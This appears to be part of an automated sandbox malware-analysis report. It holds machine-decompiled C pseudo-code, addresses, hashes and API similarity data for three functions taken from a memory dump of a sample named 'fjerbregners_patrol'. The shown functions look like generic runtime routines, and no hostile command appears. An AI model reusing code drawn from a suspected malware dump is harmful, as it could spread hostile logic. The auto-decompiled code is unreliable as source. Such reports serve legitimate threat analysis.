                                                                                                                                                                                            Function 33DCA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                                            • Opcode ID: 003abf87b9ff1e901648f077c32d178e1d96d83f8659757542d026fcb2977517
                                                                                                                                                                                            • Instruction ID: 0d2a5d39f95d81219c41e34709184efe24bfa3c46b9edc7d3541b49bc6ddb0eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 003abf87b9ff1e901648f077c32d178e1d96d83f8659757542d026fcb2977517
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C51CC79720A52DFEB08CE18C8A0A19B7F1FF89790B14416DD946CB724DB71EC55DB80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D27A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                            			E33D27A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x33dcc840);
				E33D47BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x33de5a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x33de91e0();
					E33D2B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x33de5d38; // 0x85bb915b
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x33de65fc; // 0x9371086e
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = L33D32B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							L33D48AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x33de65fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x33de65fc; // 0x9371086e
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						_push(0x33cc50b4);
						_push( *((intOrPtr*)(_t73 - 0x24)));
						 *((intOrPtr*)(_t73 - 0x3c)) = L33DA8890(_t51, _t63, _t66, 0, __eflags);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x33de91e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x33de91e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}











                                                                                                                                                                                            0x33d27a4f
                                                                                                                                                                                            0x33d27a4f
                                                                                                                                                                                            0x33d27a4f
                                                                                                                                                                                            0x33d27a51
                                                                                                                                                                                            0x33d27a56
                                                                                                                                                                                            0x33d27a5b
                                                                                                                                                                                            0x33d27a5d
                                                                                                                                                                                            0x33d27a61
                                                                                                                                                                                            0x33d27a67
                                                                                                                                                                                            0x33d27a6a
                                                                                                                                                                                            0x33d647f8
                                                                                                                                                                                            0x33d64801
                                                                                                                                                                                            0x33d64806
                                                                                                                                                                                            0x33d6480d
                                                                                                                                                                                            0x33d64810
                                                                                                                                                                                            0x33d64813
                                                                                                                                                                                            0x33d64818
                                                                                                                                                                                            0x33d6481d
                                                                                                                                                                                            0x33d64823
                                                                                                                                                                                            0x33d64825
                                                                                                                                                                                            0x33d64826
                                                                                                                                                                                            0x33d6482b
                                                                                                                                                                                            0x33d6482c
                                                                                                                                                                                            0x33d6482e
                                                                                                                                                                                            0x33d64835
                                                                                                                                                                                            0x33d64838
                                                                                                                                                                                            0x33d6483b
                                                                                                                                                                                            0x33d64840
                                                                                                                                                                                            0x33d64840
                                                                                                                                                                                            0x33d64848
                                                                                                                                                                                            0x33d64848
                                                                                                                                                                                            0x33d6484d
                                                                                                                                                                                            0x33d64852
                                                                                                                                                                                            0x33d6485b
                                                                                                                                                                                            0x33d64863
                                                                                                                                                                                            0x33d64865
                                                                                                                                                                                            0x33d6486b
                                                                                                                                                                                            0x33d6486b
                                                                                                                                                                                            0x33d6486e
                                                                                                                                                                                            0x33d64871
                                                                                                                                                                                            0x33d64885
                                                                                                                                                                                            0x33d6488a
                                                                                                                                                                                            0x33d64892
                                                                                                                                                                                            0x33d64895
                                                                                                                                                                                            0x33d64873
                                                                                                                                                                                            0x33d6487b
                                                                                                                                                                                            0x33d64881
                                                                                                                                                                                            0x33d64881
                                                                                                                                                                                            0x33d64898
                                                                                                                                                                                            0x33d6489e
                                                                                                                                                                                            0x33d27a70
                                                                                                                                                                                            0x33d27a72
                                                                                                                                                                                            0x33d27a7c
                                                                                                                                                                                            0x33d648ac
                                                                                                                                                                                            0x33d648b6
                                                                                                                                                                                            0x33d648c2
                                                                                                                                                                                            0x33d648c2

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4281723722-0
                                                                                                                                                                                            • Opcode ID: 9508541532ce94da7f5992fb25c3d8f20e5ff712d7d3a0b45d95b41624791c9d
                                                                                                                                                                                            • Instruction ID: 876f66182ee3046100beaf63d9d58ecfa735e5079939a26aef02627cbee5b82c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9508541532ce94da7f5992fb25c3d8f20e5ff712d7d3a0b45d95b41624791c9d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B310576E11218DFCF05EFA8D844A9EBBF1BB48724F10416AE521B7690DB359941CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                            			E33CEDF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x33deb370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				L33D38F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push("true");
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L33D02330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							L33D024D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x33de91e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return L33D34B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                                                                                                                            0x33cedf21
                                                                                                                                                                                            0x33cedf29
                                                                                                                                                                                            0x33cedf33
                                                                                                                                                                                            0x33cedf3b
                                                                                                                                                                                            0x33cedf40
                                                                                                                                                                                            0x33cedf44
                                                                                                                                                                                            0x33cedf46
                                                                                                                                                                                            0x33cedf52
                                                                                                                                                                                            0x33cedf56
                                                                                                                                                                                            0x33cedf5b
                                                                                                                                                                                            0x33cedf5e
                                                                                                                                                                                            0x33cedf61
                                                                                                                                                                                            0x33cedf65
                                                                                                                                                                                            0x33cedf67
                                                                                                                                                                                            0x33cee058
                                                                                                                                                                                            0x33cee05a
                                                                                                                                                                                            0x33cee05d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cedf6d
                                                                                                                                                                                            0x33cedf6d
                                                                                                                                                                                            0x33cedf70
                                                                                                                                                                                            0x33d4d6ea
                                                                                                                                                                                            0x33d4d6f3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4d6ec
                                                                                                                                                                                            0x33d4d6ec
                                                                                                                                                                                            0x33d4d6ec
                                                                                                                                                                                            0x33cedf76
                                                                                                                                                                                            0x33cedf76
                                                                                                                                                                                            0x33cedf78
                                                                                                                                                                                            0x33cedf78
                                                                                                                                                                                            0x33cedf79
                                                                                                                                                                                            0x33cedf80
                                                                                                                                                                                            0x33cee019
                                                                                                                                                                                            0x33cee024
                                                                                                                                                                                            0x33cee02c
                                                                                                                                                                                            0x33cee032
                                                                                                                                                                                            0x33cee03b
                                                                                                                                                                                            0x33cee045
                                                                                                                                                                                            0x33cee04b
                                                                                                                                                                                            0x33cee04e
                                                                                                                                                                                            0x33cee04e
                                                                                                                                                                                            0x33cedf8d
                                                                                                                                                                                            0x33cedf91
                                                                                                                                                                                            0x33cedf94
                                                                                                                                                                                            0x33cedf99
                                                                                                                                                                                            0x33cedfa0
                                                                                                                                                                                            0x33cedfab
                                                                                                                                                                                            0x33cedfb3
                                                                                                                                                                                            0x33cedfb7
                                                                                                                                                                                            0x33cedfbb
                                                                                                                                                                                            0x33cedfbc
                                                                                                                                                                                            0x33cedfc0
                                                                                                                                                                                            0x33cedfc8
                                                                                                                                                                                            0x33cedfc9
                                                                                                                                                                                            0x33cedfca
                                                                                                                                                                                            0x33cedfcd
                                                                                                                                                                                            0x33cedfe0
                                                                                                                                                                                            0x33cedfea
                                                                                                                                                                                            0x33cedfea
                                                                                                                                                                                            0x33cedfec
                                                                                                                                                                                            0x33cedfec
                                                                                                                                                                                            0x33cedf70
                                                                                                                                                                                            0x33cedff2
                                                                                                                                                                                            0x33cedff3
                                                                                                                                                                                            0x33cedff4
                                                                                                                                                                                            0x33cedfff

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: 0$0
                                                                                                                                                                                            • API String ID: 3446177414-203156872
                                                                                                                                                                                            • Opcode ID: e8f097a51cfd366d69a63a91096c88470b14a275fe453b7711e10dc94f9aaa35
                                                                                                                                                                                            • Instruction ID: bc01a1b3776a1fdd32650d6cb6b9bb7a4d26110a522afbc99dca5be237921bbd
                                                                                                                                                                                            • Opcode Fuzzy Hash: e8f097a51cfd366d69a63a91096c88470b14a275fe453b7711e10dc94f9aaa35
                                                                                                                                                                                            • Instruction Fuzzy Hash: B1418CB5A087029FD300CF28C854A4ABBE4FF89354F044A6EF888DB301D771EA45CB96
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%